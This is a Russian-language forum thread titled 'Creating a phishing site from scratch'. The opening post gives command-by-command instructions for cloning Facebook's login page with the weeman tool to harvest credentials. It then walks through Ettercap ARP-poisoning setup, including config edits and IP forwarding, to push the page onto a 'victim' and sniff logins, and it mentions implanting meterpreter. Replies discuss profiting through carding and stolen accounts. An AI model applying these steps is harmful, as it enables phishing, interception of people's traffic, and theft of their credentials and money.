• Добро пожаловать на сайт - Forumteam.bet !

    Что бы просматривать темы форума необходимо зарегестрироваться или войти в свой аккаунт.

    Группа в телеграме (подпишитесь, что бы не потерять нас) - ForumTeam Chat [Подписатся]
    Связь с администратором - @ftmadmin

Создаем фишинговый сайт с нуля

  • Автор темы Redman
  • Дата начала
  • Ответы 9
  • Просмотры 24K

Redman

<FORUMTEAM>
Команда форума
Регистрация
13.11.17
98389f43a53dbd03fff2e.png
Приступим

Сначала давайте рассмотрим зависимости

1. python 2.7

2. pip2

3. python-dev

И приступаем к установке
Сначала надо клонировать его к себе на ПК:
Код:
git clone https://github.com/evait-security/weeman.git

2de0968d8b9826024a154.png

Перейдем в директорию weeman
Код:
cd weeman

И запускаем weeman.py
Код:
sudo python2 weeman.py

После запуска видим такую картину:
bf19cc195bc63631d2a33.png

Итак начнем создание фишинг сайта:

Сначала выберем наш сайт
Код:
set url https://www.facebook.com

Выберем порт
Код:
set port 8080

И напишем куда после этого будет направлять пользователя
Код:
set action_url https://www.facebook.com

И запуск
Код:
run

9dc84c4b885e56fe4bbca.png

04fbc5e032fe22ee24f59.png

Потом если кто-то зайдет и введет свои данные мы увидим примерно такую картину

email => forumteam@email
pass => password123

Для того, чтобы подложить жертве этот сайт мы можем воспользоваться приложением вроде Ettercap или LanGhost для совершения атаки посредника. Благодаря этому, мы получим возможность перехватывать и анализировать его трафик и даже отправлять собственный трафик в его компьютер. Другими словами, из-за того, что он подключился к нашей точке доступа, мы получили полный контроль над всеми входящим и исходящим данными. Если он действительно загружает детское порно, мы это увидим.

Кроме этого, мы сможем перехватывать электронные письма и пароли к другим приложениям и сетям. При желании, мы даже можем внедрить в его систему meterpreter или другое приложение для прослушки, если хотим получить больше информации.


Ettercap
Ettercap – open source утилита для анализа безопасности компьютерных сетей. Основное предназначение которой – MITM атаки (Man In The Middle attacks – атаки типа “человек по середине”). Имеет возможность sniffing of live connections, фильтрация контента на лету, а так же много других интересных возможностей. Поддерживает как активные, так и пассивные вскрытия протоколов и включает большое количество функций для анализа сети и узла.

Более подробную информацию, можно найти на официальном сайте Ettercap.

Установка/Настройка Ettercap
Скачать и установить Ettercap можно из исходников – здесь. В качестве альтернативы можно воспользоваться следующей командой:
Код:
apt-get install ettercap-gtk ettercap-common

Прежде чем приступать к выполнению, выполним небольшую настройку. Открываем файл /etc/etter.conf:
Код:
nano /etc/etter.conf

Находим в нем вот эти строки и раскомментируем их:
Код:
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

После того, как все перечисленные выше операции сделаны, запускаем Ettercap. Однако у некоторых, в том числе и у меня, Ettercap работать не будет. Будут появляться ошибки вида “SEND L3 ERROR“. Чтобы такие ошибки не появлялись, воспользуйтесь следующей командой:
Код:
# echo "1" &gt; /proc/sys/net/ipv4/ip_forward
# cat /proc/sys/net/ipv4/ip_forward

Теперь все должно работать нормально и ошибки не должны выскакивать.


Перехват паролей
Для начала посмотрите на архитектуру сети (см. рисунок ниже), которая будет использоваться. Это нужно для того, чтобы вы хорошо понимали, что и от куда берется:
736be8aa5e31182ec0420.jpg
Запускаем Ettercap:
Код:
# ettercap -G

Перед нами появится окно приложения, как показано ниже
646e8fe0ae286c0511e4e.jpg


Щелкаем по кнопке Sniff -> Unified sniffing. После этого выбираем интерфейс, который используется. У меня это eth0:
a39e9bf21b468bc80258e.jpg


В верхнем меню нажимаем кнопки Hosts – Scan for hosts
3ae72585677a62bf94d60.jpg


Теперь опять щелкаем Hosts – Hosts list. Появится окно, как показано на рисунке ниже:
7165aae9ce618b41bc0c0.jpg

Здесь нам нужно выбрать цели, т.е. выбрать машину, которая будет выступать в качестве “жертвы” и шлюз. Как видно из архитектуры сети, которую используем, в качестве “жертвы” выступает машина с IP-адресом = 192.168.1.3. Ну а в качестве шлюза IP-адрес = 192.168.1.1. Поэтому выбираем 192.168.1.3 и нажимаем кнопку Add to Target 1. Теперь щелкаем 192.168.1.1 и нажимаем кнопку Add to Target 2.

Далее щелкаем Mitm – ARP poisoning. После этого выбираем Sniff remote connections:
aac410db9b7bf1b1b63ff.jpg

Нажимаем ОК. Осталось только запустить. Для этого нажимаем на кнопку Start – Start sniffing.

Sniffing запущен. Осталось подождать, когда пользователь будет вводить свои данные, например от почтового аккаунта:
9dcfe1c20124f48c90109.jpg

Как только он ввел свои логин/пароль и успешно вошел на свой почтовый ящик, злоумышленник также успешно перехватил его логин и пароль:
Код:
HTTP : 94.100.184.17:443 -&gt; USER: <strong>my_testing_akk</strong>  PASS: <strong>my_secret_password</strong>  INFO: http://mail.ru/
 

vladimir.bog.94

Пользователь на проверке
На проверке
Регистрация
07.05.20
Это на линуксе?
Если на виндовс, то как врубить эту панель?
 

fourday

Проявляет активность
Местный
Регистрация
02.01.20
если во всем в этом разобраться, можно столько бабок поиметь, даже на той же информации. Тема пушка.
Как думаете стоит лезть сюда? Тут же все можно намутить и свой картон и акки и фулки - всё одним словом: главное знать как этой информацией пользоваться
 

BenCarset

Пользователь на проверке
На проверке
Регистрация
30.11.20
если во всем в этом разобраться, можно столько бабок поиметь, даже на той же информации. Тема пушка.
Как думаете стоит лезть сюда? Тут же все можно намутить и свой картон и акки и фулки - всё одним словом: главное знать как этой информацией пользоваться
сам ведь себе дал ответ на вопрос )
 

bex

Пользователь на проверке
На проверке
Регистрация
18.01.21
спасибо за инфу, подскажите это на линуксе или на винде
 
Сверху Снизу